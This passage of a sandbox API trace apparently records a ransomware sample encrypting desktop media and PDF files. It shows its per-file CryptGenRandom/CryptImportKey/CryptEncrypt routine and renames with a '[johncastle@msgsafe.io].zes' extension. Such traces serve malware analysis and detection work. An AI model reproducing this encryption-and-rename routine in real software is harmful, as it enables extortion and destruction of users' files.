lpBuffer=0x544b60*, lpNumberOfBytesWritten=0x23ffc90*=0x10, lpOverlapped=0x0) returned 1 [0134.083] WriteFile (in: hFile=0x124, lpBuffer=0x544a18*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x544a18*, lpNumberOfBytesWritten=0x23ffc90*=0x80, lpOverlapped=0x0) returned 1 [0134.083] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x23ffcb8 | out: lpNewFilePointer=0x0) returned 1 [0134.083] WriteFile (in: hFile=0x124, lpBuffer=0x23ffca8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x23ffca8*, lpNumberOfBytesWritten=0x23ffc90*=0x8, lpOverlapped=0x0) returned 1 [0134.083] CryptImportKey (in: hProv=0x534c10, pbData=0x544958, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x23ffc94 | out: phKey=0x23ffc94*=0x53a5f8) returned 1 [0134.083] CryptSetKeyParam (hKey=0x53a5f8, dwParam=0x1, pbData=0x544b60, dwFlags=0x0) returned 1 [0134.083] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.083] ReadFile (in: hFile=0x124, lpBuffer=0x2140020, nNumberOfBytesToRead=0x8dbb, lpNumberOfBytesRead=0x23ffc9c, lpOverlapped=0x0 | out: lpBuffer=0x2140020*, lpNumberOfBytesRead=0x23ffc9c*=0x8dbb, lpOverlapped=0x0) returned 1 [0134.084] CryptEncrypt (in: hKey=0x53a5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2140020*, pdwDataLen=0x23ffc78*=0x8dc0, dwBufLen=0x8dc0 | out: pbData=0x2140020*, pdwDataLen=0x23ffc78*=0x8dc0) returned 1 [0134.084] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.084] WriteFile (in: hFile=0x124, lpBuffer=0x2140020*, nNumberOfBytesToWrite=0x8dc0, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x2140020*, lpNumberOfBytesWritten=0x23ffc90*=0x8dc0, lpOverlapped=0x0) returned 1 [0134.086] CryptDestroyKey (hKey=0x53a5f8) returned 1 [0134.086] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x8ea4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.086] SetEndOfFile (hFile=0x124) returned 1 [0134.089] GetProcessHeap () returned 0x520000 [0134.089] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544aa0 | out: hHeap=0x520000) returned 1 [0134.089] GetProcessHeap () returned 0x520000 [0134.089] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544b60 | out: hHeap=0x520000) returned 1 [0134.090] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\D_5K_QCaeZaqS1f_Oh_.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\d_5k_qcaezaqs1f_oh_.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\D_5K_QCaeZaqS1f_Oh_.avi.[4B2E4630].[johncastle@msgsafe.io].zes" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\d_5k_qcaezaqs1f_oh_.avi.[4b2e4630].[johncastle@msgsafe.io].zes")) returned 1 [0134.097] CloseHandle (hObject=0x124) returned 1 [0134.098] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x0) returned 0x102 [0134.098] FindNextFileW (in: hFindFile=0x544b08, lpFindFileData=0x23ffd20 | out: lpFindFileData=0x23ffd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd9be0aa0, ftCreationTime.dwHighDateTime=0x1d5da10, ftLastAccessTime.dwLowDateTime=0x1222bd30, ftLastAccessTime.dwHighDateTime=0x1d5e6c5, ftLastWriteTime.dwLowDateTime=0x1222bd30, ftLastWriteTime.dwHighDateTime=0x1d5e6c5, nFileSizeHigh=0x0, nFileSizeLow=0x7f18, dwReserved0=0x0, dwReserved1=0xffff, cFileName="h9 vL1qAQ0j.mp3", cAlternateFileName="H9VL1Q~1.MP3")) returned 1 [0134.098] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h9 vL1qAQ0j.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\h9 vl1qaq0j.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0134.098] GetProcessHeap () returned 0x520000 [0134.098] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x544b60 [0134.098] CryptGenRandom (in: hProv=0x534c10, dwLen=0x10, pbBuffer=0x544b60 | out: pbBuffer=0x544b60) returned 1 [0134.098] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x23ffcb0 | out: lpNewFilePointer=0x0) returned 1 [0134.098] WriteFile (in: hFile=0x124, lpBuffer=0x23ffcc0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x23ffcc0*, lpNumberOfBytesWritten=0x23ffc90*=0x8, lpOverlapped=0x0) returned 1 [0134.099] CryptImportKey (in: hProv=0x534c10, pbData=0x544890, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x23ffc94 | out: phKey=0x23ffc94*=0x53a5f8) returned 1 [0134.099] CryptSetKeyParam (hKey=0x53a5f8, dwParam=0x1, pbData=0x544b60, dwFlags=0x0) returned 1 [0134.099] GetProcessHeap () returned 0x520000 [0134.099] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x40) returned 0x535588 [0134.100] CryptEncrypt (in: hKey=0x53a5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x535588*, pdwDataLen=0x23ffc78*=0x40, dwBufLen=0x40 | out: pbData=0x535588*, pdwDataLen=0x23ffc78*=0x40) returned 1 [0134.100] CryptDestroyKey (hKey=0x53a5f8) returned 1 [0134.100] WriteFile (in: hFile=0x124, lpBuffer=0x535588*, nNumberOfBytesToWrite=0x40, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x535588*, lpNumberOfBytesWritten=0x23ffc90*=0x40, lpOverlapped=0x0) returned 1 [0134.100] WriteFile (in: hFile=0x124, lpBuffer=0x23ffc98*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x23ffc98*, lpNumberOfBytesWritten=0x23ffc90*=0x4, lpOverlapped=0x0) returned 1 [0134.100] WriteFile (in: hFile=0x124, lpBuffer=0x544b60*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x544b60*, lpNumberOfBytesWritten=0x23ffc90*=0x10, lpOverlapped=0x0) returned 1 [0134.100] WriteFile (in: hFile=0x124, lpBuffer=0x544990*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x544990*, lpNumberOfBytesWritten=0x23ffc90*=0x80, lpOverlapped=0x0) returned 1 [0134.100] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x23ffcb8 | out: lpNewFilePointer=0x0) returned 1 [0134.100] WriteFile (in: hFile=0x124, lpBuffer=0x23ffca8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x23ffca8*, lpNumberOfBytesWritten=0x23ffc90*=0x8, lpOverlapped=0x0) returned 1 [0134.100] CryptImportKey (in: hProv=0x534c10, pbData=0x544890, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x23ffc94 | out: phKey=0x23ffc94*=0x53a5f8) returned 1 [0134.100] CryptSetKeyParam (hKey=0x53a5f8, dwParam=0x1, pbData=0x544b60, dwFlags=0x0) returned 1 [0134.100] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.101] ReadFile (in: hFile=0x124, lpBuffer=0x2140020, nNumberOfBytesToRead=0x7f18, lpNumberOfBytesRead=0x23ffc9c, lpOverlapped=0x0 | out: lpBuffer=0x2140020*, lpNumberOfBytesRead=0x23ffc9c*=0x7f18, lpOverlapped=0x0) returned 1 [0134.101] CryptEncrypt (in: hKey=0x53a5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2140020*, pdwDataLen=0x23ffc78*=0x7f20, dwBufLen=0x7f20 | out: pbData=0x2140020*, pdwDataLen=0x23ffc78*=0x7f20) returned 1 [0134.101] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.101] WriteFile (in: hFile=0x124, lpBuffer=0x2140020*, nNumberOfBytesToWrite=0x7f20, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x2140020*, lpNumberOfBytesWritten=0x23ffc90*=0x7f20, lpOverlapped=0x0) returned 1 [0134.102] CryptDestroyKey (hKey=0x53a5f8) returned 1 [0134.102] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x7ff4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.102] SetEndOfFile (hFile=0x124) returned 1 [0134.104] GetProcessHeap () returned 0x520000 [0134.104] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x535588 | out: hHeap=0x520000) returned 1 [0134.104] GetProcessHeap () returned 0x520000 [0134.104] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544b60 | out: hHeap=0x520000) returned 1 [0134.104] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h9 vL1qAQ0j.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\h9 vl1qaq0j.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h9 vL1qAQ0j.mp3.[4B2E4630].[johncastle@msgsafe.io].zes" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\h9 vl1qaq0j.mp3.[4b2e4630].[johncastle@msgsafe.io].zes")) returned 1 [0134.108] CloseHandle (hObject=0x124) returned 1 [0134.108] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x0) returned 0x102 [0134.108] FindNextFileW (in: hFindFile=0x544b08, lpFindFileData=0x23ffd20 | out: lpFindFileData=0x23ffd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a841b50, ftCreationTime.dwHighDateTime=0x1d5e104, ftLastAccessTime.dwLowDateTime=0x67fd1970, ftLastAccessTime.dwHighDateTime=0x1d5e6e4, ftLastWriteTime.dwLowDateTime=0x67fd1970, ftLastWriteTime.dwHighDateTime=0x1d5e6e4, nFileSizeHigh=0x0, nFileSizeLow=0xc059, dwReserved0=0x0, dwReserved1=0xffff, cFileName="j-fJcx.m4a", cAlternateFileName="")) returned 1 [0134.108] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\j-fJcx.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\j-fjcx.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0134.108] GetProcessHeap () returned 0x520000 [0134.108] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x544b60 [0134.109] CryptGenRandom (in: hProv=0x534c10, dwLen=0x10, pbBuffer=0x544b60 | out: pbBuffer=0x544b60) returned 1 [0134.109] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x23ffcb0 | out: lpNewFilePointer=0x0) returned 1 [0134.109] WriteFile (in: hFile=0x124, lpBuffer=0x23ffcc0*, nNumberOfBytesToWrite=0x7, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x23ffcc0*, lpNumberOfBytesWritten=0x23ffc90*=0x7, lpOverlapped=0x0) returned 1 [0134.110] CryptImportKey (in: hProv=0x534c10, pbData=0x544958, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x23ffc94 | out: phKey=0x23ffc94*=0x53a5f8) returned 1 [0134.110] CryptSetKeyParam (hKey=0x53a5f8, dwParam=0x1, pbData=0x544b60, dwFlags=0x0) returned 1 [0134.110] GetProcessHeap () returned 0x520000 [0134.110] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x30) returned 0x53a568 [0134.110] CryptEncrypt (in: hKey=0x53a5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x53a568*, pdwDataLen=0x23ffc78*=0x30, dwBufLen=0x30 | out: pbData=0x53a568*, pdwDataLen=0x23ffc78*=0x30) returned 1 [0134.110] CryptDestroyKey (hKey=0x53a5f8) returned 1 [0134.110] WriteFile (in: hFile=0x124, lpBuffer=0x53a568*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x53a568*, lpNumberOfBytesWritten=0x23ffc90*=0x30, lpOverlapped=0x0) returned 1 [0134.110] WriteFile (in: hFile=0x124, lpBuffer=0x23ffc98*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x23ffc98*, lpNumberOfBytesWritten=0x23ffc90*=0x4, lpOverlapped=0x0) returned 1 [0134.110] WriteFile (in: hFile=0x124, lpBuffer=0x544b60*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x544b60*, lpNumberOfBytesWritten=0x23ffc90*=0x10, lpOverlapped=0x0) returned 1 [0134.110] WriteFile (in: hFile=0x124, lpBuffer=0x544a18*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x544a18*, lpNumberOfBytesWritten=0x23ffc90*=0x80, lpOverlapped=0x0) returned 1 [0134.110] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x23ffcb8 | out: lpNewFilePointer=0x0) returned 1 [0134.110] WriteFile (in: hFile=0x124, lpBuffer=0x23ffca8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x23ffca8*, lpNumberOfBytesWritten=0x23ffc90*=0x8, lpOverlapped=0x0) returned 1 [0134.111] CryptImportKey (in: hProv=0x534c10, pbData=0x544958, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x23ffc94 | out: phKey=0x23ffc94*=0x53a5f8) returned 1 [0134.111] CryptSetKeyParam (hKey=0x53a5f8, dwParam=0x1, pbData=0x544b60, dwFlags=0x0) returned 1 [0134.111] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.111] ReadFile (in: hFile=0x124, lpBuffer=0x2140020, nNumberOfBytesToRead=0xc059, lpNumberOfBytesRead=0x23ffc9c, lpOverlapped=0x0 | out: lpBuffer=0x2140020*, lpNumberOfBytesRead=0x23ffc9c*=0xc059, lpOverlapped=0x0) returned 1 [0134.111] CryptEncrypt (in: hKey=0x53a5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2140020*, pdwDataLen=0x23ffc78*=0xc060, dwBufLen=0xc060 | out: pbData=0x2140020*, pdwDataLen=0x23ffc78*=0xc060) returned 1 [0134.112] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.112] WriteFile (in: hFile=0x124, lpBuffer=0x2140020*, nNumberOfBytesToWrite=0xc060, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x2140020*, lpNumberOfBytesWritten=0x23ffc90*=0xc060, lpOverlapped=0x0) returned 1 [0134.112] CryptDestroyKey (hKey=0x53a5f8) returned 1 [0134.112] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0xc124, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.112] SetEndOfFile (hFile=0x124) returned 1 [0134.116] GetProcessHeap () returned 0x520000 [0134.116] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x53a568 | out: hHeap=0x520000) returned 1 [0134.116] GetProcessHeap () returned 0x520000 [0134.116] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544b60 | out: hHeap=0x520000) returned 1 [0134.116] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\j-fJcx.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\j-fjcx.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\j-fJcx.m4a.[4B2E4630].[johncastle@msgsafe.io].zes" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\j-fjcx.m4a.[4b2e4630].[johncastle@msgsafe.io].zes")) returned 1 [0134.127] CloseHandle (hObject=0x124) returned 1 [0134.128] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x0) returned 0x102 [0134.128] FindNextFileW (in: hFindFile=0x544b08, lpFindFileData=0x23ffd20 | out: lpFindFileData=0x23ffd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x335a1ae0, ftCreationTime.dwHighDateTime=0x1d5e164, ftLastAccessTime.dwLowDateTime=0x61df73c0, ftLastAccessTime.dwHighDateTime=0x1d5d9c0, ftLastWriteTime.dwLowDateTime=0x61df73c0, ftLastWriteTime.dwHighDateTime=0x1d5d9c0, nFileSizeHigh=0x0, nFileSizeLow=0x1ae1, dwReserved0=0x0, dwReserved1=0xffff, cFileName="JTNWKHDQn2XuLRv.png", cAlternateFileName="JTNWKH~1.PNG")) returned 1 [0134.128] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\JTNWKHDQn2XuLRv.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\jtnwkhdqn2xulrv.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0134.128] GetProcessHeap () returned 0x520000 [0134.128] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x544b60 [0134.128] CryptGenRandom (in: hProv=0x534c10, dwLen=0x10, pbBuffer=0x544b60 | out: pbBuffer=0x544b60) returned 1 [0134.128] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x23ffcb0 | out: lpNewFilePointer=0x0) returned 1 [0134.128] WriteFile (in: hFile=0x124, lpBuffer=0x23ffcc0*, nNumberOfBytesToWrite=0xf, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x23ffcc0*, lpNumberOfBytesWritten=0x23ffc90*=0xf, lpOverlapped=0x0) returned 1 [0134.130] CryptImportKey (in: hProv=0x534c10, pbData=0x544890, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x23ffc94 | out: phKey=0x23ffc94*=0x53a568) returned 1 [0134.130] CryptSetKeyParam (hKey=0x53a568, dwParam=0x1, pbData=0x544b60, dwFlags=0x0) returned 1 [0134.130] GetProcessHeap () returned 0x520000 [0134.130] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x50) returned 0x544aa0 [0134.130] CryptEncrypt (in: hKey=0x53a568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x544aa0*, pdwDataLen=0x23ffc78*=0x50, dwBufLen=0x50 | out: pbData=0x544aa0*, pdwDataLen=0x23ffc78*=0x50) returned 1 [0134.130] CryptDestroyKey (hKey=0x53a568) returned 1 [0134.130] WriteFile (in: hFile=0x124, lpBuffer=0x544aa0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x544aa0*, lpNumberOfBytesWritten=0x23ffc90*=0x50, lpOverlapped=0x0) returned 1 [0134.130] WriteFile (in: hFile=0x124, lpBuffer=0x23ffc98*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x23ffc98*, lpNumberOfBytesWritten=0x23ffc90*=0x4, lpOverlapped=0x0) returned 1 [0134.130] WriteFile (in: hFile=0x124, lpBuffer=0x544b60*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x544b60*, lpNumberOfBytesWritten=0x23ffc90*=0x10, lpOverlapped=0x0) returned 1 [0134.130] WriteFile (in: hFile=0x124, lpBuffer=0x544990*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x544990*, lpNumberOfBytesWritten=0x23ffc90*=0x80, lpOverlapped=0x0) returned 1 [0134.130] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x23ffcb8 | out: lpNewFilePointer=0x0) returned 1 [0134.130] WriteFile (in: hFile=0x124, lpBuffer=0x23ffca8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x23ffca8*, lpNumberOfBytesWritten=0x23ffc90*=0x8, lpOverlapped=0x0) returned 1 [0134.131] CryptImportKey (in: hProv=0x534c10, pbData=0x544890, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x23ffc94 | out: phKey=0x23ffc94*=0x53a568) returned 1 [0134.131] CryptSetKeyParam (hKey=0x53a568, dwParam=0x1, pbData=0x544b60, dwFlags=0x0) returned 1 [0134.131] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.131] ReadFile (in: hFile=0x124, lpBuffer=0x2140020, nNumberOfBytesToRead=0x1ae1, lpNumberOfBytesRead=0x23ffc9c, lpOverlapped=0x0 | out: lpBuffer=0x2140020*, lpNumberOfBytesRead=0x23ffc9c*=0x1ae1, lpOverlapped=0x0) returned 1 [0134.131] CryptEncrypt (in: hKey=0x53a568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2140020*, pdwDataLen=0x23ffc78*=0x1af0, dwBufLen=0x1af0 | out: pbData=0x2140020*, pdwDataLen=0x23ffc78*=0x1af0) returned 1 [0134.131] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.131] WriteFile (in: hFile=0x124, lpBuffer=0x2140020*, nNumberOfBytesToWrite=0x1af0, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x2140020*, lpNumberOfBytesWritten=0x23ffc90*=0x1af0, lpOverlapped=0x0) returned 1 [0134.131] CryptDestroyKey (hKey=0x53a568) returned 1 [0134.131] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x1bd4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.131] SetEndOfFile (hFile=0x124) returned 1 [0134.135] GetProcessHeap () returned 0x520000 [0134.135] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544aa0 | out: hHeap=0x520000) returned 1 [0134.135] GetProcessHeap () returned 0x520000 [0134.135] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544b60 | out: hHeap=0x520000) returned 1 [0134.135] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\JTNWKHDQn2XuLRv.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\jtnwkhdqn2xulrv.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\JTNWKHDQn2XuLRv.png.[4B2E4630].[johncastle@msgsafe.io].zes" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\jtnwkhdqn2xulrv.png.[4b2e4630].[johncastle@msgsafe.io].zes")) returned 1 [0134.141] CloseHandle (hObject=0x124) returned 1 [0134.141] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x0) returned 0x102 [0134.141] FindNextFileW (in: hFindFile=0x544b08, lpFindFileData=0x23ffd20 | out: lpFindFileData=0x23ffd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd5c7d930, ftCreationTime.dwHighDateTime=0x1d5d96b, ftLastAccessTime.dwLowDateTime=0x26a93000, ftLastAccessTime.dwHighDateTime=0x1d5dbc5, ftLastWriteTime.dwLowDateTime=0x26a93000, ftLastWriteTime.dwHighDateTime=0x1d5dbc5, nFileSizeHigh=0x0, nFileSizeLow=0x12b12, dwReserved0=0x0, dwReserved1=0xffff, cFileName="K8FlFC.pdf", cAlternateFileName="")) returned 1 [0134.141] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\K8FlFC.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\k8flfc.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0134.142] GetProcessHeap () returned 0x520000 [0134.142] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x544b60 [0134.142] CryptGenRandom (in: hProv=0x534c10, dwLen=0x10, pbBuffer=0x544b60 | out: pbBuffer=0x544b60) returned 1 [0134.142] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x23ffcb0 | out: lpNewFilePointer=0x0) returned 1 [0134.142] WriteFile (in: hFile=0x124, lpBuffer=0x23ffcc0*, nNumberOfBytesToWrite=0xe, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x23ffcc0*, lpNumberOfBytesWritten=0x23ffc90*=0xe, lpOverlapped=0x0) returned 1 [0134.143] CryptImportKey (in: hProv=0x534c10, pbData=0x544958, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x23ffc94 | out: phKey=0x23ffc94*=0x53a568) returned 1 [0134.143] CryptSetKeyParam (hKey=0x53a568, dwParam=0x1, pbData=0x544b60, dwFlags=0x0) returned 1 [0134.143] GetProcessHeap () returned 0x520000 [0134.143] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x30) returned 0x53a5f8 [0134.143] CryptEncrypt (in: hKey=0x53a568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x53a5f8*, pdwDataLen=0x23ffc78*=0x30, dwBufLen=0x30 | out: pbData=0x53a5f8*, pdwDataLen=0x23ffc78*=0x30) returned 1 [0134.143] CryptDestroyKey (hKey=0x53a568) returned 1 [0134.143] WriteFile (in: hFile=0x124, lpBuffer=0x53a5f8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x53a5f8*, lpNumberOfBytesWritten=0x23ffc90*=0x30, lpOverlapped=0x0) returned 1 [0134.143] WriteFile (in: hFile=0x124, lpBuffer=0x23ffc98*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x23ffc98*, lpNumberOfBytesWritten=0x23ffc90*=0x4, lpOverlapped=0x0) returned 1 [0134.143] WriteFile (in: hFile=0x124, lpBuffer=0x544b60*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x544b60*, lpNumberOfBytesWritten=0x23ffc90*=0x10, lpOverlapped=0x0) returned 1 [0134.143] WriteFile (in: hFile=0x124, lpBuffer=0x544a18*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x544a18*, lpNumberOfBytesWritten=0x23ffc90*=0x80, lpOverlapped=0x0) returned 1 [0134.144] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x23ffcb8 | out: 